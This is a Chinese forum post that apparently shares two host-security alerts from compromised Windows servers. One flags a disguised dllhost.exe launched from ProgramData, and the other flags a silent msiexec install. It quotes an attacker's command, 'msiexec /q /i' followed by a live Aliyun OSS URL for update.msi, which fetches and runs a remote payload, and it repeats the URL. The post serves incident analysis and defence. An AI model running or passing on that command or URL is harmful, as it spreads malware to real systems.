本帖最后由 Yansongwei 于 2023-4-12 02:06 编辑
[Asm] 纯文本查看 复制代码 事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-11 22:28:22 事件主机 : OM-VM-0009 事件的ID : aae9d6c560c186225877f147f6dfd666 事件主机IP: 172.21.202.76 / None 事件的名称: 可疑的进程路径 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. 告警原因: 该进程文件路径伪装成了一个正常的系统文件,但实际执行的进程内部代码已被替换为其他内容。 用户名: - 命令行: "C:\Windows\SysWOW64\dllhost.exe" 进程路径: C:/Windows/SysWOW64/dllhost.exe 进程ID: 45228 父进程命令行: C:\ProgramData\CdnSvc\dwm.exe 父进程文件路径: C:/ProgramData/CdnSvc/dwm.exe 父进程ID: 72336 MD5: - K8s集群ID: - K8s节点ID: - 容器ID: - 镜像ID: - 容器hostname: - 容器主ip: - 容器视角进程路径: - 容器挂载的宿主机目录: - 容器内挂载点: - 容器视角文件路径: - 描述: 检测模型发现您服务器上某个进程从一个不寻常的路径启动,常规软件通常不会在这种目录中,该进程有可能是病毒、木马、黑客入侵过程中放置的工具。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为.
事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-12 01:00:38 事件主机 : OM-VM-0053 事件的ID : ba1f34e486fcccb3cb0249a250dedf43 事件主机IP: 172.21.202.90 / None 事件的名称: 异常调用系统工具 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. ATT&CK 矩阵ID: T1218.007 系统工具: Msiexec 意图: 执行代码 命令行: msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 命令行: - 进程路径: C:/Windows/System32/msiexec.exe 进程ID: 495664 父进程命令行: cmd.exe /C msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 父进程文件路径: C:/Windows/System32/cmd.exe 父进程ID: 516424 描述: 检测模型发现您服务器上有进程正以一种可疑方式的调用系统工具,木马病毒或黑客常常会通过这种方式绕过常规的安全软件来下载恶意文件、加载恶意代码、执行加解密操作等其他恶意操作。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为. ---
https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi |